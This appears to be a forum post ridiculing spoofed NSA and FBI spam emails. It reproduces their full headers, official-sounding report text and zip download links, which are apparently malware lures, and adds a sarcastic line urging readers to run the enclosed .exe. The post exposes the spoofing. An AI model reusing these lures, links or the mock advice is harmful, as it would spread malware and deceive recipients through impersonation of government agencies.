I like how the NSA is sending spam from a third-rate ISP in Pakistan:
From - Wed Dec 9 14:48:37 2009
X-Account-Key: account4
X-UIDL: 0LcA3x-1Nz2UC3QM1-00jdJv
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:
Return-Path: <postmaster@comsatshosting.net>
Delivery-Date: Wed, 09 Dec 2009 04:48:22 -0500
Received: from spamfilter.comsatshosting.net (ibnsena.comsats.net.pk [210.56.8.55])
by mx.perfora.net (node=mxus2) with ESMTP (Nemesis)
id 0LcA3x-1Nz2UC3QM1-00jdJv for
myworkemailaddress@company.com; Wed, 09 Dec 2009 04:48:22 -0500
Received: from spamfilter.comsatshosting.net (spamfilter.comsatshosting.net [127.0.0.1])
by postfix.imss70 (Postfix) with ESMTP id E8BBB3ACE43
for <myworkemailaddress@company.com>; Wed, 9 Dec 2009 01:56:48 +0500 (PKT)
Received: from winserver1.comsatshosting.net (winserver1.comsatshosting.net [64.38.4.122])
by spamfilter.comsatshosting.net (Postfix) with ESMTP id 5D2363ACF50
for <myworkemailaddress@company.com>; Wed, 9 Dec 2009 01:56:48 +0500 (PKT)
Received: from winserver1 [127.0.0.1] by winserver1.comsatshosting.net
(SMTPD-8.22) id AFEC05DC; Wed, 09 Dec 2009 14:37:48 +0500
Date: Wed, 09 Dec 2009 14:37:48 +0500
Subject: CYBER-PMESII COMMANDER’S ANALYSIS OF FORECAST EFFECTS
To:
myworkemailaddress@company.comFrom:
ecus@nsa.govMessage-Id: <200912091437597.SM04040@winserver1>
X-TM-AS-Product-Ver: IMSS-7.1.0.1224-6.0.0.1038-17058.006
X-TM-AS-Result: No-0.180-4.5-31-1
X-imss-scan-details: No-0.180-4.5-31-1
Envelope-To:
myworkemailaddress@company.comAFRL-RI-RS-TR-2009-136
Final Technical Report
December 2009
CYBER-PMESII COMMANDER’S ANALYSIS OF FORECAST EFFECTS (CYBERCAFE)
INFORMATION SUBJECT TO EXPORT CONTROL LAWS
WARNING - This document contains technical data whose export is restricted by the Arms Export
Control Act (Title 22, U.S.C., Sec 2751 et seq.) or the Export Administration Act of 1979, as amended
(Title 50, U.S.C. App. 2401, et seq.). Violations of these export laws are subject to severe criminal
penalties. Disseminate IAW DoDD 5230.25.
DESTRUCTION NOTICE - For classified documents, follow the procedures in DOD 5220.22-M, National
Industrial Security Manual (NISPOM), section 5-705 or DOD 5200.1-R, Information Security Program,
Chapter VI. For unclassified limited documents, destroy by any method that will prevent disclosure of
contents or reconstruction of the document.
Export of the attached information (which includes, in some circumstances, release to
foreign nationals within the United States) without first obtaining approval or license from
the Department of State for items controlled by the International Traffic in Arms
Regulation (ITAR), or the Department of Commerce for items controlled by the Export
Administration Regulation (EAR), may constitute a violation of law.
Download:
http://www.zeropaid.com/bbs/includes/CYBERCAFE.zipor
http://rapidshare.com/files/318309046/C ... E.zip.htmlhttp://www.sendspace.com/file/fmbt01======================
The FBI relays email through a cheap ISP in the UK! Who would've thought?
http://www.enixltd.com/Obviously this .zip file contains something important, you should download the .exe in it and run it. If it doesn't do anything run it three more times just to be sure. Then call your IT department helpdesk.
From - Sun Feb 21 23:32:35 2010
X-Account-Key: account4
X-UIDL: 0LZhUC-1NLoQx3ffo-00lXxV
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:
Return-Path: <nobody@abe.enixns.com>
Delivery-Date: Sat, 20 Feb 2010 21:37:16 -0500
Received: from abe.enixns.com (abe.enixns.com [84.45.45.134])
by mx.perfora.net (node=mxus0) with ESMTP (Nemesis)
id 0LZhUC-1NLoQx3ffo-00lXxV for
myworkemail@company.com; Sat, 20 Feb 2010 21:37:16 -0500
Received: from nobody by abe.enixns.com with local (Exim 4.69)
(envelope-from <nobody@abe.enixns.com>)
id 1Nj1h4-0007MW-8f
for
myworkemail@company.com; Sun, 21 Feb 2010 02:37:14 +0000
To:
myworkemail@company.comSubject: INTELLIGENCE BULLETIN
From:
cttd@fbi.govMessage-Id: <E1Nj1h4-0007MW-8f@abe.enixns.com>
Date: Sun, 21 Feb 2010 02:37:14 +0000
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - abe.enixns.com
X-AntiAbuse: Original Domain - mycompanysdomainname.com
X-AntiAbuse: Originator/Caller UID/GID - [99 99] / [47 12]
X-AntiAbuse: Sender Address Domain - abe.enixns.com
Envelope-To:
myworkemail@company.comFEDERAL BUREAU OF INVESTIGATION
INTELLIGENCE BULLETIN
February 2010
Weapons of Mass Destruction Directorate
Indicators for Terrorist Use of Toxic Industrial Chemicals
THIS INTELLIGENCE BULLETIN PROVIDES LAW ENFORCEMENT AND OTHER
PUBLIC SAFETY OFFICIALS WITH SITUATIONAL AWARENESS CONCERNING
INTERNATIONAL AND DOMESTIC TERRORIST TACTICS.
UNCLASSIFIED//FOR OFFICIAL USE ONLY
Download:
http://timingsolution.com/Doc/BULLETIN.zipor
http://www.sendspace.com/file/goz3yd